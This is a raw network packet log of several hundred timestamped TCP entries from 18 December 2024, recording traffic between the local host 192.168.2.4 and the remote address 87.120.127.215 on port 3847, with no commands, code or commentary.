                                                                                                                                                Dec 18, 2024 19:27:19.052511930 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.052706003 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.053455114 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.123416901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.123476028 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.123660088 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.124741077 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.125523090 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.125556946 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.125616074 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.129276037 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.129338026 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.129362106 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.132929087 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.132992983 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.133023024 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.136689901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.136746883 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.136809111 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.140211105 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.140284061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.140335083 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.143923998 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.143979073 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.143990040 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.146945000 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.147002935 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.147062063 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.150160074 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.150216103 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.150224924 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.152962923 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.153019905 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.153069019 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.156092882 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.156156063 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.156183004 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.159115076 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.159181118 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.159252882 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.162424088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.162462950 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.162522078 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.165209055 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.165271997 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.165412903 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.168361902 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.168416023 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.168508053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.171761036 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.171813965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.171828032 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.173667908 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.173755884 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.173804998 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.175766945 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.175995111 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.176043987 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.177890062 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.178227901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.178284883 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.180126905 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.180183887 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.180361032 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.182260036 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.182317019 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.182370901 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.184405088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.184442043 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.184504986 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.186737061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.186772108 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.186794996 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.188848019 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.188883066 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.188904047 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.190839052 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.190892935 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.190952063 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.192965984 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.193031073 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.193056107 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.195250988 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.195285082 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.195348978 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.197408915 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.197444916 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.197506905 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.199532032 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.199605942 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.199656963 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.201482058 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.201534986 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.201601028 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.203830957 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.203927994 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.203936100 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.205760002 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.205805063 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.205873013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.207947969 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.207987070 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.208014965 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.210084915 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.210225105 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.210280895 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.212681055 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.212696075 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.212737083 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.214667082 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.214684010 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.214704990 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.216577053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.216622114 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.316397905 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.316668987 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.316750050 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.317317009 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.317353964 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.317460060 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.319076061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.319129944 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.320787907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.320847988 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.320883989 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.320934057 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.322634935 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.322798014 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.322854996 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.324526072 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.324668884 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.324727058 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.326482058 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.326517105 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.326678991 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.328139067 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.328326941 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.328438044 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.329720020 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.329879045 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.329932928 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.331512928 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.331590891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.331645966 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.333271027 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.333466053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.333610058 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.334907055 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.335058928 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.335107088 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.336994886 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.337058067 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.337116003 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.338335037 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.338407993 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.338618994 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.339771032 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.340003014 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.340511084 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.341496944 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.341592073 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.341645956 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.343135118 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.343218088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.343291998 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.344558001 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.344695091 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.344754934 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.346251965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.346438885 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.346491098 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.347788095 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.347821951 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.349272013 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.349283934 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.349358082 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.349410057 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.351242065 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.351303101 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.351459026 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.352533102 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.352590084 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.352694988 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.354101896 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.354140043 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.354193926 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.355499983 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.355537891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.355597973 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.357024908 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.357122898 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.357182026 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.358797073 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.358833075 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.358887911 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.360286951 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.360322952 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.360485077 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.361677885 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.361774921 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.362704992 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.363401890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.363491058 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.363606930 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.364984035 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.365040064 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.365452051 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.366345882 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.366381884 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.366594076 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.367990017 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.368154049 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.368201971 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.369482040 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.369554996 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.369611025 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.371098042 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.371181965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.371279001 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.372539043 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.372634888 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.372701883 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.374176979 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.374264956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.374391079 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.376024008 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.376058102 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.376172066 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.377180099 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.377288103 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.377341032 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.379522085 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.379556894 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.379795074 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.381237984 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.381289959 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.381458998 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.382505894 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.382540941 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.382875919 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.383497953 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.383533955 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.383588076 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.385055065 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.385165930 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.385229111 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.386617899 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.386653900 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.386739016 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.388134003 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.388169050 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.388984919 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.389586926 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.389636993 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.389795065 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.391161919 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.391371965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.392761946 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.392796993 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.392816067 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.392867088 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.394334078 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.394370079 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.394428968 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.395802975 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.395885944 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.395988941 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.397406101 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.441396952 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.508452892 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.508552074 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.508616924 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.509095907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.509253979 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.509471893 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.510612965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.510885954 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.510942936 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.511754036 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.511864901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.511928082 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.513051987 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.513154984 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.513220072 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.514414072 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.514549971 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.514610052 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.515713930 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.515837908 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.517028093 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.517091990 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.517116070 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.517168999 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.518317938 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.518436909 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.518491030 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.519592047 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.519654989 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.519711971 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.520817995 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.520872116 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.520930052 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.522131920 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.522248983 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.522306919 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:19.523344040 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.523436069 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:19.524580956 CET38474984087.120.127.215192.168.2.4
